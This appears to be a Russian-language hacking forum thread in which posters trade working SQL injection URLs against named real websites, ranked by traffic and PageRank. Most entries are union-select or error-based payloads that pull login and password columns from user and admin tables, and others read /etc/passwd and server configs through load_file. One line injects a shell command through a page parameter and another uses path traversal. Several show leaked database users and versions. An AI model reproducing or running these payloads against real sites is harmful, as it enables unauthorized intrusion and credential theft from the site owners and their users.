SQL Инъекции

Унылый женский журнал

PHP:

http://sarafan.dp.ua/journal.php?id=-168'+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--+h

и доска объявлений.

PHP:

http://www.ukrobyava.com.ua/idv.php?id=-21314'+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+h

 

ТИЦ == 240

PHP:

http://www.image-media.ru/blog/?id=1A%00xa7A%3f

http://www.image-media.ru/partner/

 

Классика жанра

PHP:

http://www.imperiogrande.ru/catalog.php?categoryid=1&itemid=-230+union+select+1,2,concat_ws(0x03a,login,password),4,5,6,7,8,9,10,11,12+from+users--

PHP:

http://www.sistrom.ru/?lang=-2+union+select+1--

 

PR == 2

PHP:

http://www.grupo3turismo.com.ar/news.php?id=-1%20union%20all%20select%201,2,unhex%28hex%28gro up_concat%28USR_NAME_LAST,char%2858%29,USR_PWD%29%29%29 ,4,5,6,7,8,9,10 ,11,12,13%20from%20USERS--

 

Отвечу не менее классическим error-based'ом, в таком случае

PHP:

http://www.internails.ru/index.php?productID=154+and+(select+1+from(select+count(*),concat(database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--

 

Code:

http://www.loverussia.name/events_view.php?eid=%28select+table_name+from+%28select+count%280%20%29,concat%28%28select%20count%28*%29%20from%20user%29,floor%28rand%280%29*2%29%29+from%20+information_schema.tables+group+by+2+limit+1%29a%29

 

HTML:

http://www.trooppage.com/show_product.php?id=-98+union+select+1,2,3,4,5,group_concat(0x03a,usr_username,0x03a,usr_password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+ul_user

http://www.trooppage.com/admin/

 

Code:

http://www.ancientexcavation.com/products.php?category_ID=5+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764)--

PR: 2 ТИЦ: 0 G-idx: 1 370 Y-idx: 33

Code:

http://levybaldante.com/news_print.php?id=-1+union+select+load_file(0x2f6574632f706173737764)%2Cload_file(0x2f6574632f706173737764)%2Cload_file(0x2f6574632f706173737764)

PR: 3 ТИЦ: 0 G-idx: 270 Y-idx: 31 Alexa: 12 566 542

 

Турагентство

PHP:

http://mangodv.ru/index.php?id=strani&strana=59'

 

Для будущих невест

ТИЦ == 50, PR == 3; ЯК == true;

PHP:

http://wedding-salon.com.ua/index.php?id=main&page=blog&id_news=-38+union+select+1,concat_ws(0x03a,user_id,login,password,access),3,4,5,6,7,8+from+cns_users--

Вывод в <title>

 

http://www.southmississippi.biz/news/article.php
?id=00032
&vol=10+union+select+1,2,version(),4,5,6,7,8,9,10,11--
Вывод в самом низу.
ПР:3
4.1.21 4

 

СЛИВКИ!
ТИЦ:750 PR:4 инд.Я:65000 инд.G:152000 траф:5500

вот что сказал гугл по ачату)))

 

Code:

http://www.happycow.net/respondtoreview1.php?id=-5420+/*!union*/+/*!select*/+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29--&rvid=13077

Username: happycow_con2db@localhost
Version: 5.0.95-community
Database: happycow_hcdata

GooglePR: 6

 

Очень толстый сайт. Дерзайте.

ТИЦ == 2300, PR == 2, трафф == 10k, ЯK == true, DMOZ == true;

PHP:

http://saint-petersburg.ru/loc/opros/vote.php?id=-9+union+select+1,2,load_file('/usr/local/etc/nginx/nginx.conf'),4,5,6,7,8,9,10,11,12,13,14,15,16,17--

 

Code:

http://pharmacyschool.usc.edu/faculty/?id=-95+union+select+1,2,3,4,concat_ws(user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--

PR=6

 

PHP :

PHP:

http://www.healthplus.hk/past_details.php?id=-74%20union%20select%201,2,3,4,g  roup_concat%28table_name%29  ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,  25,26,27+from+information_schema.tables-

PHP:

http://www.vivamagonline.com/DidYouKnow.php?ID=-10%20union%20select%201,2,3,group_concat%28table_name%29,5,6+f rom+information_schema.t ables--

PHP:

http://cs.furman.edu/blog/index.php?id=null%20union%20all%20select%201,gr  oup_concat%28id,0x3a,user,0x3a,p  assword%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,  18,19,20,21,22,23,24,25,26%20from%20zp_administrators--

PHP:

https://www.kisantech.com/index.php?cat_id=-1+UNION+SELECT+group_concat%28u  ser,0x3a,p  ass%29,2,3,4,5,6,7,8 ,9,10+from+store_config--

PHP:

http://bollystic.com/Bollywood/showMovie.php?id=-564%20union%20select%201,2,3,4,g  roup_concat%28user,0x3a,p  assword%29,6,7,8,9,10%20from%20mysql.user--

Code:

http://www.thompsonhistory.co.uk/cgi-bin/page.pl?page=|ls%20-la|

http://edu.nstru.ac.th/~english/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd

 

Ничего зверского, но нате )

Code:

http://www.mntk21.ru/news_list.php?id=1+union+select+concat_ws(0x3a,version(),user(),database()),2--

5.0.51a-24+lenny5:c1_mntk21@localhost:c1_mntk21

Code:

http://bc.ru/news_list.php?id=568+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--

4.0.27:[email protected]:belmontgroup

Code:

http://www.gogreenplumber.com/news_list.php?id=164+and+1=0+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

4.1.22-standard:gogreen_gogreen@localhost:gogreen_gogreen

Code:

http://gsonline.hu/portal/news_list.php?id=1+union+select+1,concat_ws(0x3a,version(),user(),database())

5.0.95-community:gsonli01_user1@localhost:gsonli01_db1

 

Code:

http://ponovo.com.cn/product_category.php?ID=47+union+select+concat_ws(0x3a,version(),user(),database()),2+--+

5.0.92-log:[email protected]:relaytestdb

PR: 4

 

Сайт члена партии "Яблоко".

 

Code:

http://www.tdkmpk.ru/product.php?id=2+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4+--+

PR: 1